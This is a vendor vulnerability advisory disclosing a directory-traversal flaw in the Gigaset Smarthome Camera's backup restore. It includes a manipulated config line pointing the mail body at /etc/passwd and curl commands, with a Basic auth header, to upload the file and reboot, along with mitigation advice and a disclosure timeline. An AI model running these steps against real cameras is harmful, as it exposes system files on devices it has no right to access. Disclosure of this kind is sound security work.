SIK-2016-047


Title:

Directory Traversal and Information Leakage Through Backup in Gigast Smarthome Camera

Report ID

SIK-2016-047

Summary:

  • Vendor: Gigaset elements GmbH
  • Product: Gigaset Smarthome Camera
  • Affected Version: Firmware 1.10 (build 20140802)
  • Severity: medium
  • Short summary: Information leakage through backup function modifying backup image.

Details:

The camera configuration interface allows to backup and restore the camera configuration. The backup file can be modified in a way to gather more information from the camera environment (access to system files) after restoring the manipulated backup. The configuration path for the default message body sending an information or alert mail can be redirected to other system paths and files. The content of the redirected file will be shown after a reboot in the message body box. Excerpt of modified firmware backup file:

[smtp1]
...
MAILBODYFILE=/etc/passwd

The uploading, rebooting and read process can be automated:

curl -H 'Authorization: Basic YWRtaW46VEZWRFMwOVVWa1kzTmtJd01FRXdPRVl5UXpkWlEwRk5Wa1k9' -F
upload=@/home/ironic/teamsik/config.cfg 'http://10.148.207.32/form/restore'

curl -H 'Authorization: Basic YWRtaW46VEZWRFMwOVVWa1kzTmtJd01FRXdPRVl5UXpkWlEwRk5Wa1k9'
http://10.148.207.32/form/reboot

Workaround

In general, it is hard to define effective workarounds to guarantee the protection of the system. The attack is realized by an internal attacker, so a secure network infrastructure is important.

Suggested Mitigation

The recovery functions of the configuration backup must verify the configuration path and restrict the access to external paths. No system/ os path and file should be readable from the configuration interface.

Timeline

  • 2016-07-27 Vulnerability Discovered
  • 2016-08-15 Vulnerability Reported
  • 2016-09-14 Vulnerability Fixed